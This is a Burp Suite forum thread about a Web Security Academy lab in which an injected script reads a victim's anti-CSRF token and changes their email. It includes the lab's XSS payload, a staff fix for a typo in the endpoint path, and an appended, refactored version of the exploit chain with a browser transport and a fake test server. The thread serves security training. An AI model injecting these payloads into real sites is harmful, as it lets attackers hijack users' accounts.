Burp Suite User Forum


Web Security Academy - Exploiting XSS to perform CSRF

Pelumi | Last updated: Jun 06, 2019 10:02PM UTC

I am having trouble determining where to put the token within the payload given in the solution:

    <script>
    var req = new XMLHttpRequest();
    req.onload = handleResponse;
    req.open('get','/email',true);
    req.send();
    function handleResponse() {
        var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
        var changeReq = new XMLHttpRequest();
        changeReq.open('post', '/email', true);
        changeReq.send('csrf='+token+'&email=test@test.com')
    };
    </script>

Am I supposed to replace (\w+)?

PortSwigger Agent | Last updated: Jun 07, 2019 01:58PM UTC

That code will automatically fetch the anti-CSRF token and include it in the second request. Try submitting it as a blog comment. If that doesn't work, drop us a line.

Burp User | Last updated: Jun 11, 2019 12:57AM UTC

I've tried multiple times to submit the code as a blog comment but I keep getting the 'Thank you for your comment' page with the lab unsolved.

Burp User | Last updated: Jun 11, 2019 01:53AM UTC

I copied the code and inserted into a blog comment verbatim.

PortSwigger Agent | Last updated: Jun 11, 2019 09:32AM UTC

We've just spotted a typo in the solution. The line:

    changeReq.open('post', '/email', true);

should be:

    changeReq.open('post', '/email/change', true);

We will get this fixed in the coming days, but for now you can make the change manually.

Burp User | Last updated: Jun 11, 2019 02:19PM UTC

Thanks much.

Methoros | Last updated: Apr 28, 2020 11:17AM UTC

Wanted to ask, as I haven't been able to find the answer. In this portion of the code below:

    var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];

What is the [1] for? Is it to search for the number 1 of an array value 1? JavaScript is 0-based, so what is the [1] for?

Hannah, PortSwigger Agent | Last updated: Apr 30, 2020 11:20AM UTC

Hi, in this function we are using regex matching. With regex, you provide a pattern in between slashes, like /foo/, and then match it against a string like "foo bar". A match object is returned, so if the match object variable name is "m":

    m[0] == "foo"

If you use a pattern like /foo (bar)/ against "foo bar", the parentheses provide a "submatch".

/foo (bar)/ against "foo bar":

    m[0] == "foo bar"
    m[1] == "bar"

/(foo) (bar)/ against "foo bar":

    m[0] == "foo bar"
    m[1] == "foo"
    m[2] == "bar"

Therefore, we use the [1] to retrieve the value of the csrf token that is contained within the parentheses, rather than the whole string.

Aakash | Last updated: Apr 22, 2021 10:03AM UTC

    var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];

Can anyone explain step by step what exactly the regex is doing? Why this particular sequence of slashes (backward and then forward), the + sign, the w?

Hannah, PortSwigger Agent | Last updated: Apr 22, 2021 10:28AM UTC

The two forward slashes in the "match" function denote the start and end of the regular expression.

For a step-by-step breakdown of a regular expression, I would recommend pasting the expression (/name="csrf" value="(\w+)"/) into an online tool, like RegExr - it's really handy for breaking down the different components to help you understand what's going on!

Muhammed | Last updated: Jul 08, 2021 07:14PM UTC

I wonder how it is sending the request with the CSRF token when we didn't use the var token after assigning it?

Hannah, PortSwigger Agent | Last updated: Jul 12, 2021 08:50AM UTC

If you look at the solution, you can see that the token variable is used in the last line of the script:

    changeReq.send('csrf='+token+'&email=test@test.com')
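The two points raised in this thread, the [1] capture group that pulls the token out of the fetched page and the reuse of that token in the second, state-changing request, as an added example that is not part of this thread or of the Web Security Academy solution. It splits the payload into testable functions, injects the transport so the chain can be run offline against a constructed fake of the target, and uses the /email and /email/change paths quoted above; the HTML served by the fake is made up for the example. Unlike the quoted payload it also handles the case where match() finds nothing (indexing [1] on null throws a TypeError), sets an explicit form Content-Type, and URL-encodes the body values.

```javascript
// Added example (not from the lab solution or this thread): the XSS-to-CSRF chain
// discussed above, split into functions that can be exercised offline.
//   1. extract the anti-CSRF token from the HTML of a page the victim is logged into
//   2. chain a POST to the change-email endpoint that carries that token
// Paths are the ones quoted in the thread; the page HTML below is constructed.

const TOKEN_RE = /name="csrf" value="(\w+)"/;

// Returns capture group 1 (the token between the quotes), or null when the page has
// no csrf field. The thread's payload indexes [1] immediately, which throws when
// match() returns null; checking first makes that failure visible instead.
function extractCsrfToken(html) {
  const m = html.match(TOKEN_RE);
  return m ? m[1] : null;
}

// Form body for the change request. encodeURIComponent stops characters such as
// '+' or '&' in the new address from being read as form syntax by the server.
function buildChangeBody(token, email) {
  return 'csrf=' + encodeURIComponent(token) + '&email=' + encodeURIComponent(email);
}

// Full chain: GET the page, extract the token, POST the change with it.
// `transport` is { get(path), post(path, body, headers) }, so the same code runs
// over XMLHttpRequest in a browser or over the fake below in a test.
async function exploitChain(transport, email) {
  const page = await transport.get('/email');
  const token = extractCsrfToken(page);
  if (token === null) {
    return { ok: false, reason: 'no csrf token in page' };
  }
  const status = await transport.post(
    '/email/change',
    buildChangeBody(token, email),
    { 'Content-Type': 'application/x-www-form-urlencoded' }
  );
  return { ok: status === 200, token: token, status: status };
}

// Constructed fake of the target (assumption, not the real lab server): serves a
// page with a token and accepts the POST only at the corrected path, with the
// form Content-Type, and with a csrf value equal to the one it issued.
function makeFakeServer(token) {
  const state = { email: 'wiener@normal-user.net' };
  const page =
    '<form name="change-email-form" action="/email/change" method="POST">' +
    '<input required type="email" name="email" value="">' +
    '<input required type="hidden" name="csrf" value="' + token + '">' +
    '</form>';
  return {
    state: state,
    async get(path) {
      return path === '/email' ? page : '<h1>Not found</h1>';
    },
    async post(path, body, headers) {
      if (path !== '/email/change') return 404;
      if (headers['Content-Type'] !== 'application/x-www-form-urlencoded') return 415;
      const params = new URLSearchParams(body);
      if (params.get('csrf') !== token) return 400; // anti-CSRF check
      state.email = params.get('email');
      return 200;
    },
  };
}

// Browser transport over XMLHttpRequest, matching the payload quoted in the thread.
// A same-origin XHR carries the victim's session cookie, which is why the injected
// script can read a token the attacker could never obtain cross-site.
function xhrTransport() {
  function send(method, path, body, headers) {
    return new Promise(function (resolve) {
      const req = new XMLHttpRequest();
      req.open(method, path, true);
      Object.keys(headers || {}).forEach(function (h) { req.setRequestHeader(h, headers[h]); });
      req.onload = function () { resolve(method === 'GET' ? req.responseText : req.status); };
      req.send(body);
    });
  }
  return {
    get: function (path) { return send('GET', path); },
    post: function (path, body, headers) { return send('POST', path, body, headers); },
  };
}
```

In a browser the payload becomes `exploitChain(xhrTransport(), 'test@test.com')` inside the injected script tag; against the fake, `exploitChain(makeFakeServer('AbC123xyz'), 'test@test.com')` resolves to `{ ok: true, ... }` and the fake's stored email changes. Pointing the fake's accepted path back at `/email`, as the original typo did, makes the POST return 404 and shows why the comment was accepted but the lab stayed unsolved.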
